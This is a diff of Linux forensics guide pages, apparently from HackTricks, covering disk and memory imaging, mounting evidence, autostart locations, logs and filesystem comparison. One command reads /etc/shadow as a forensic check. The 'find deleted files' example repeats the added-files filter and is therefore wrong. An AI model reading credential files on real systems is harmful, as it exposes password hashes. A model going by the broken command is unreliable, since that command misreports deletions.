You can [**download the FTK imager from here**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1). You can [**download the FTK imager from here**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1).
@ -44,7 +42,7 @@ You can [**download the FTK imager from here**](https://accessdata.com/product-d
ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --description 'A description' --examiner 'Your name' ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --description 'A description' --examiner 'Your name'
``` ```
### EWF ## EWF
You can generate a dick image using the[ **ewf tools**](https://github.com/libyal/libewf). You can generate a dick image using the[ **ewf tools**](https://github.com/libyal/libewf).
@ -59,19 +57,19 @@ ewfacquire /dev/sdb
#Media characteristics: physical #Media characteristics: physical
#File format: encase6 #File format: encase6
#Compression method: deflate #Compression method: deflate
#Compression level: fast #Compression level: fast
#Then use default values #Then use default values
#It will generate the disk image in the current directory #It will generate the disk image in the current directory
``` ```
## Mount # Mount
### Several types ## Several types
In **Windows** you can try to use the free version of Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) to **mount the forensics image**. In **Windows** you can try to use the free version of Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) to **mount the forensics image**.
### Raw ## Raw
```bash ```bash
#Get file type #Get file type
@ -82,7 +80,7 @@ evidence.img: Linux rev 1.0 ext4 filesystem data, UUID=1031571c-f398-4bfb-a414-b
mount evidence.img /mnt mount evidence.img /mnt
``` ```
### EWF ## EWF
```bash ```bash
#Get file type #Get file type
@ -99,11 +97,11 @@ output/ewf1: Linux rev 1.0 ext4 filesystem data, UUID=05acca66-d042-4ab2-9e9c-be
mount output/ewf1 -o ro,norecovery /mnt mount output/ewf1 -o ro,norecovery /mnt
``` ```
### ArsenalImageMounter ## ArsenalImageMounter
It's a Windows Application to mount volumes. You can download it here [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/) It's a Windows Application to mount volumes. You can download it here [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)
### Errors ## Errors
* **`cannot mount /dev/loop0 read-only`** in this case you need to use the flags **`-o ro,norecovery`** * **`cannot mount /dev/loop0 read-only`** in this case you need to use the flags **`-o ro,norecovery`**
* **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** in this case the mount failed due as the offset of the filesystem is different than that of the disk image. You need to find the Sector size and the Start sector: * **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** in this case the mount failed due as the offset of the filesystem is different than that of the disk image. You need to find the Sector size and the Start sector:

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Linux Forensics # Initial Information Gathering
## Initial Information Gathering ## Basic Information
### Basic Information
First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USN, and modify the env variables to use those binaries: First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USN, and modify the env variables to use those binaries:
@ -50,7 +48,7 @@ cat /etc/shadow #Unexpected data?
find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory
``` ```
#### Suspicious information ### Suspicious information
While obtaining the basic information you should check for weird things like: While obtaining the basic information you should check for weird things like:
@ -58,7 +56,7 @@ While obtaining the basic information you should check for weird things like:
* Check **registered logins** of users without a shell inside `/etc/passwd` * Check **registered logins** of users without a shell inside `/etc/passwd`
* Check for **password hashes** inside `/etc/shadow` for users without a shell * Check for **password hashes** inside `/etc/shadow` for users without a shell
### Memory Dump ## Memory Dump
In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\ In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\
In order to **compile** it you need to use the **exact same kernel** the victim machine is using. In order to **compile** it you need to use the **exact same kernel** the victim machine is using.
@ -83,14 +81,14 @@ LiME supports 3 **formats**:
LiME can also be use to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444` LiME can also be use to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444`
### Disk Imaging ## Disk Imaging
#### Shutting down ### Shutting down
First of all you will need to **shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown.\ First of all you will need to **shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown.\
There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but I will also allow the possible **malware** to **destroy evidences**. The "pull the plug" approach may carry **some information loss** (as we have already took an image of the memory not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug. There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but I will also allow the possible **malware** to **destroy evidences**. The "pull the plug" approach may carry **some information loss** (as we have already took an image of the memory not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug.
#### Taking an image of the disk ### Taking an image of the disk
It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information. It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information.
@ -103,7 +101,7 @@ dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<c
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
``` ```
### Disk Image pre-analysis ## Disk Image pre-analysis
Imaging that you receive a disk image with no more data. Imaging that you receive a disk image with no more data.
@ -160,9 +158,9 @@ icat -i raw -f ext4 disk.img 16
ThisisTheMasterSecret ThisisTheMasterSecret
``` ```
## Search for known Malware # Search for known Malware
### Modified System Files ## Modified System Files
Some Linux systems have a feature to **verify the integrity of many installed components**, providing an effective way to identify unusual or out of place files. For instance, `rpm -Va` on Linux is designed to verify all packages that were installed using RedHat Package Manager. Some Linux systems have a feature to **verify the integrity of many installed components**, providing an effective way to identify unusual or out of place files. For instance, `rpm -Va` on Linux is designed to verify all packages that were installed using RedHat Package Manager.
@ -174,7 +172,7 @@ dpkg --verify
debsums | grep -v "OK$" #apt-get install debsums debsums | grep -v "OK$" #apt-get install debsums
``` ```
### Malware/Rootkit Detectors ## Malware/Rootkit Detectors
Read the following page to learn about tools that can be useful to find malware: Read the following page to learn about tools that can be useful to find malware:
@ -182,9 +180,9 @@ Read the following page to learn about tools that can be useful to find malware:
[malware-analysis.md](malware-analysis.md) [malware-analysis.md](malware-analysis.md)
{% endcontent-ref %} {% endcontent-ref %}
## Search installed programs # Search installed programs
### Package Manager ## Package Manager
On Debian-based systems, the _**/var/ lib/dpkg/status**_ file contains details about installed packages and the _**/var/log/dpkg.log**_ file records information when a package is installed.\ On Debian-based systems, the _**/var/ lib/dpkg/status**_ file contains details about installed packages and the _**/var/log/dpkg.log**_ file records information when a package is installed.\
On RedHat and related Linux distributions the **`rpm -qa --root=/ mntpath/var/lib/rpm`** command will list the contents of an RPM database on a subject systems. On RedHat and related Linux distributions the **`rpm -qa --root=/ mntpath/var/lib/rpm`** command will list the contents of an RPM database on a subject systems.
@ -197,7 +195,7 @@ cat /var/log/dpkg.log | grep installed
rpm -qa --root=/ mntpath/var/lib/rpm rpm -qa --root=/ mntpath/var/lib/rpm
``` ```
### Other ## Other
**Not all installed programs will be listed by the above commands** because some applications are not available as packages for certain systems and must be installed from source. Therefore, a review of locations such as _**/usr/local**_ and _**/opt**_ may reveal other applications that have been compiled and installed from source code. **Not all installed programs will be listed by the above commands** because some applications are not available as packages for certain systems and must be installed from source. Therefore, a review of locations such as _**/usr/local**_ and _**/opt**_ may reveal other applications that have been compiled and installed from source code.
@ -215,13 +213,13 @@ find /sbin/ -exec dpkg -S {} \; | grep "no path found"
find /sbin/ exec rpm -qf {} \; | grep "is not" find /sbin/ exec rpm -qf {} \; | grep "is not"
``` ```
## Recover Deleted Running Binaries # Recover Deleted Running Binaries
![](<../../.gitbook/assets/image (641).png>) ![](<../../.gitbook/assets/image (641).png>)
## Inspect AutoStart locations # Inspect AutoStart locations
### Scheduled Tasks ## Scheduled Tasks
```bash ```bash
cat /var/spool/cron/crontabs/* \ cat /var/spool/cron/crontabs/* \
@ -237,7 +235,7 @@ cat /var/spool/cron/crontabs/* \
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
``` ```
### Services ## Services
It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries. It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries.
@ -250,11 +248,11 @@ It is extremely common for malware to entrench itself as a new, unauthorized ser
* _**/etc/systemd/system**_ * _**/etc/systemd/system**_
* _**/etc/systemd/system/multi-user.target.wants/**_ * _**/etc/systemd/system/multi-user.target.wants/**_
### Kernel Modules ## Kernel Modules
On Linux systems, kernel modules are commonly used as rootkit components to malware packages. Kernel modules are loaded when the system boots up based on the configuration information in the `/lib/modules/'uname -r'` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items that are related to malware. On Linux systems, kernel modules are commonly used as rootkit components to malware packages. Kernel modules are loaded when the system boots up based on the configuration information in the `/lib/modules/'uname -r'` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items that are related to malware.
### Other AutoStart Locations ## Other AutoStart Locations
There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware. There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware.
@ -262,11 +260,11 @@ There are several configuration files that Linux uses to automatically launch an
* _**/.bashrc**_ , _**/.bash\_profile**_ , _**\~/.profile**_ , _**/.config/autostart**_ are executed when the specific user logs in. * _**/.bashrc**_ , _**/.bash\_profile**_ , _**\~/.profile**_ , _**/.config/autostart**_ are executed when the specific user logs in.
* _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel. * _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel.
## Examine Logs # Examine Logs
Look in all available log files on the compromised system for traces of malicious execution and associated activities such as creation of a new service. Look in all available log files on the compromised system for traces of malicious execution and associated activities such as creation of a new service.
### Pure Logs ## Pure Logs
**Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\ **Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\
Interesting system logons: Interesting system logons:
@ -293,7 +291,7 @@ Interesting system logons:
Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. In fact, because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering. Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. In fact, because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering.
{% endhint %} {% endhint %}
### Command History ## Command History
Many Linux systems are configured to maintain a command history for each user account: Many Linux systems are configured to maintain a command history for each user account:
@ -302,7 +300,7 @@ Many Linux systems are configured to maintain a command history for each user ac
* \~/.sh\_history * \~/.sh\_history
* \~/.\*\_history * \~/.\*\_history
### Logins ## Logins
Using the command `last -Faiwx` it's possible to get the list of users that have logged in.\ Using the command `last -Faiwx` it's possible to get the list of users that have logged in.\
It's recommended to check if those logins make sense: It's recommended to check if those logins make sense:
@ -314,7 +312,7 @@ This is important as **attackers** some times may copy `/bin/bash` inside `/bin/
Note that you can also **take a look to this information reading the logs**. Note that you can also **take a look to this information reading the logs**.
### Application Traces ## Application Traces
* **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account (_**/.ssh/authorized\_keys**_ and _**/.ssh/known\_keys**_). These entries can reveal the hostname or IP address of the remote hosts. * **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account (_**/.ssh/authorized\_keys**_ and _**/.ssh/known\_keys**_). These entries can reveal the hostname or IP address of the remote hosts.
* **Gnome Desktop**: User accounts may have a _**/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running in the Gnome desktop. * **Gnome Desktop**: User accounts may have a _**/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running in the Gnome desktop.
@ -323,20 +321,20 @@ Note that you can also **take a look to this information reading the logs**.
* **MySQL**: User accounts may have a _**/.mysql\_history**_ file that contains queries executed using MySQL. * **MySQL**: User accounts may have a _**/.mysql\_history**_ file that contains queries executed using MySQL.
* **Less**: User accounts may have a _**/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less * **Less**: User accounts may have a _**/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less
### USB Logs ## USB Logs
[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables. [**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables.
It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USB to find "violation events" (the use of USBs that aren't inside that list). It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USB to find "violation events" (the use of USBs that aren't inside that list).
### Installation ## Installation
``` ```
pip3 install usbrip pip3 install usbrip
usbrip ids download #Downloal USB ID database usbrip ids download #Downloal USB ID database
``` ```
### Examples ## Examples
``` ```
usbrip events history #Get USB history of your curent linux machine usbrip events history #Get USB history of your curent linux machine
@ -348,13 +346,13 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
## Review User Accounts and Logon Activities # Review User Accounts and Logon Activities
Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks.\ Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks.\
Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\ Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\
Finally look for accounts with **no passwords** or **easily guessed** passwords. Finally look for accounts with **no passwords** or **easily guessed** passwords.
## Examine File System # Examine File System
File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**.\ File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**.\
**Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.\ **Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.\
@ -377,27 +375,27 @@ You can check the inodes of the files inside a folder using `ls -lai /bin |sort
Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modify at the **same time** of the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**. Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modify at the **same time** of the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**.
{% endhint %} {% endhint %}
## Compare files of different filesystem versions # Compare files of different filesystem versions
#### Find added files ### Find added files
```bash ```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
``` ```
#### Find Modified content ### Find Modified content
```bash ```bash
git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time" git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time"
``` ```
#### Find deleted files ### Find deleted files
```bash ```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
``` ```
#### Other filters ### Other filters
**`-diff-filter=[(A|C|D|M|R|T|U|X|B)…​[*]]`** **`-diff-filter=[(A|C|D|M|R|T|U|X|B)…​[*]]`**
@ -407,7 +405,7 @@ Also, **these upper-case letters can be downcased to exclude**. E.g. `--diff-fil
Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries (because the set of paths included in the diff is limited by what is in the index). Similarly, copied and renamed entries cannot appear if detection for those types is disabled. Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries (because the set of paths included in the diff is limited by what is in the index). Similarly, copied and renamed entries cannot appear if detection for those types is disabled.
## References # References
* [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf) * [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf)
* [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/) * [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)

Some files were not shown because too many files have changed in this diff Show more